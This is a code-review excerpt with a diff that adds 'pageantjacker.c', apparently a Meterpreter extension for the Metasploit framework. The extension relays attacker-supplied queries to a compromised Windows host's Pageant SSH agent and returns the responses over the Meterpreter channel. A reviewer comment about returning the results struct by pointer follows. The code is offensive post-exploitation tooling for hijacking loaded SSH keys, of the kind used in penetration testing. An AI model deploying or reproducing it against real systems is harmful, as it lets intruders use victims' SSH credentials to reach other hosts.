source/extensions/pageantjacker/pageantjacker.c

```diff
@@ -0,0 +1,186 @@
+// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
+#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+// this sets the delay load hook function, see DelayLoadMetSrv.h
+EnableDelayLoadMetSrv();
+
+Command customCommands[] =
+{
+	COMMAND_REQ("pageant_send_query", request_pageant_send_query),
+	COMMAND_TERMINATOR
+};
+
+DWORD request_pageant_send_query(Remote *remote, Packet *packet)
+{
+	Packet *response = packet_create_response(packet);
+	DWORD raw_data_size_in;
+	Byte *raw_data_in;
+	PAGEANTQUERYRESULTS results = { 0 };
+
+	// Retrieve from metasploit
+	raw_data_size_in = packet_get_tlv_value_uint(packet, TLV_TYPE_EXTENSION_PAGEANTJACKER_SIZE_IN);
+	raw_data_in = packet_get_tlv_value_raw(packet, TLV_TYPE_EXTENSION_PAGEANTJACKER_BLOB_IN);
+	
+	dprintf("[PJ(request_pageant_send_query)] Size in: %d. Data is at 0x%p", raw_data_size_in, raw_data_in);
+
+	// Interact with Pageant. Note that this will always return a struct, even if the operation failed.
+	dprintf("[PJ(request_pageant_send_query)] Forwarding query to Pageant");
+	results = send_query_to_pageant(raw_data_in, raw_data_size_in);
+
+	// Build the packet based on the respones from the Pageant interaction.
+	packet_add_tlv_bool(response, TLV_TYPE_EXTENSION_PAGEANTJACKER_STATUS, results.result);
+	packet_add_tlv_raw(response, TLV_TYPE_EXTENSION_PAGEANTJACKER_RETURNEDBLOB, results.blob, results.bloblength);
+	packet_add_tlv_string(response, TLV_TYPE_EXTENSION_PAGEANTJACKER_ERRORMESSAGE, results.error_message);	
+	dprintf("[PJ(request_pageant_send_query)] Success: %d. Return data len %d, data is at 0x%p. Error message at 0x%p (%s)", results.result, results.bloblength, results.blob, &results.error_message, results.error_message);
+
+	// Free the allocated memory once we are done
+	if (results.blob) {
+		free(results.blob);
+		dprintf("[PJ(request_pageant_send_query)] Freed results blob");
+	}
+
+	// Transmit the packet to metasploit
+	packet_transmit_response(ERROR_SUCCESS, remote, response);
+
+	return ERROR_SUCCESS;
+}
+
+
+/*!
+ * @brief Initialize the server extension
+ */
+DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+{
+	hMetSrv = remote->met_srv;
+
+	command_register_all(customCommands);
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+ * @brief Deinitialize the server extension
+ */
+DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+{
+	command_deregister_all(customCommands);
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+* @brief Get the name of the extension.
+* @param buffer Pointer to the buffer to write the name to.
+* @param bufferSize Size of the \c buffer parameter.
+* @return Indication of success or failure.
+*/
+DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
+{
+	strncpy_s(buffer, bufferSize, "pageantjacker", bufferSize - 1);
+	return ERROR_SUCCESS;
+}
+
+PAGEANTQUERYRESULTS send_query_to_pageant(byte *query, unsigned int querylength) {

```

Comment:
So returning `PAGEANTQUERYRESULTS` is an atypical approach. While it'll work, it forces a full copy of the structure on return. Instead, this should be taken as a parameter to the function (`PAGEANTQUERYRESULTS* results`), and the caller can pass in a reference to one they already have. This prevents the unnecessary copy and keeps things inline with how this kind of thing is done elsewhere. The return value of the function should be an indicator of whether the function succeeded or not.